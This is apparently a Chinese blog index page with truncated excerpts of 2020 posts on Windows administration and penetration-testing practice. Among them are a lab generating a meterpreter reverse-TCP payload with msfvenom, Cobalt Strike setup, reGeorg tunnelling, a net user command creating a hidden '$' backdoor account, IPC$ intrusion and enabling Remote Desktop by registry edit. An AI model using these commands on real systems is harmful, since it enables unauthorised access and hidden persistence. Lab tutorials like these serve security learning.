摘要:首先搭建一个域服务器,后续的机器全部加入该域控 --安装命令DCPROMO 然后一直点下一步即可 --删除域命令,在服务器端删除,命令也是dcpromo,前提是尽量所有用户都已经退出域 阅读全文
posted @ 2020-06-28 16:27 梦幻泡影离殇 阅读(39) 评论(0) 推荐(0) 编辑
摘要:准备环境:攻击机kali:192.168.1.104 靶机:win2008 :192.168.1.103 192.168.137.130(模拟内网ip) 使用msfvenom生成一个木马,msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=19 阅读全文
posted @ 2020-06-23 19:08 梦幻泡影离殇 阅读(305) 评论(0) 推荐(0) 编辑
摘要:1.先安装java环境= = 备注:如果是Kali的话,自带了Java环境是openjdk,可以先卸载apt-get remove openjdk-8-j* 1. 下载1.8u121的JAVA JDK (新的java JDK不稳定)!!原因:https://blog.cobaltstrike.com 阅读全文
posted @ 2020-06-12 11:44 梦幻泡影离殇 阅读(316) 评论(0) 推荐(0) 编辑
摘要:刚用虚拟机安装完的Kali执行apt-get时报错,原因是因为找不到对应的源 然后执行ape-get update 还是报错 解决办法: 选对下载源很重要,这就主要看你的kali版本了 在kali /etc目录下找到debian_version,打开它 cat debian_version 然后就选 阅读全文
posted @ 2020-06-07 00:06 梦幻泡影离殇 阅读(93) 评论(0) 推荐(0) 编辑
摘要:思路:1、查看该端口被什么软件占用。2、如何找出该软件并且关闭该软件 假设我的1080端口被占用 查看当前进程连接情况:netstat -ano 或者通过下列命令直接定位是哪个软件 通过端口找到对应的pid:netstat -ano | findstr "端口" 通过pid查看指定的进程taskli 阅读全文
posted @ 2020-06-06 17:03 梦幻泡影离殇 阅读(59) 评论(0) 推荐(0) 编辑
摘要:reGeorg的前身是2008年SensePost在BlackHat USA 2008 的 reDuh延伸与扩展。也是目 前安全从业人员使用最多,范围最广,支持多丰富的一款http隧道。从本质上讲,可以将 JSP/PHP/ASP/ASPX等页面上传到目标服务器,便可以访问该服务器后面的主机。 攻击机 阅读全文
posted @ 2020-06-05 15:12 梦幻泡影离殇 阅读(184) 评论(0) 推荐(0) 编辑
摘要:一、"命令提示符"中的阴谋 其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的"命令提示符"就可以制作一个简单的隐藏账户。 点击"开始"→"运行",输入"CMD"运行"命令提示符",输入"net user piao$ 123456 /add",回车,成功后会显示"命令成功完成"。接着 阅读全文
posted @ 2020-05-31 15:54 梦幻泡影离殇 阅读(69) 评论(0) 推荐(0) 编辑
摘要:转载于:https://www.cnblogs.com/KmXlOf/articles/4649912.html 一 唠叨一下:网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.不过话虽这样说,但我个人 阅读全文
posted @ 2020-05-30 20:11 梦幻泡影离殇 阅读(44) 评论(0) 推荐(0) 编辑
摘要:1、命令行模式开启,运行cmd,执行这条命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f或者 REG ADD HKLM 阅读全文
posted @ 2020-05-29 10:09 梦幻泡影离殇 阅读(64) 评论(0) 推荐(0) 编辑
摘要:1、开始-控制面板-window防火墙 2、点列外选项,点击添加端口 3、添加完后重启一下系统,可以使用telnet IP 端口,的方式测试端口是否已经开启,或者通过netstat -an命令查看 阅读全文
posted @ 2020-05-29 00:17 梦幻泡影离殇 阅读(184) 评论(0) 推荐(0) 编辑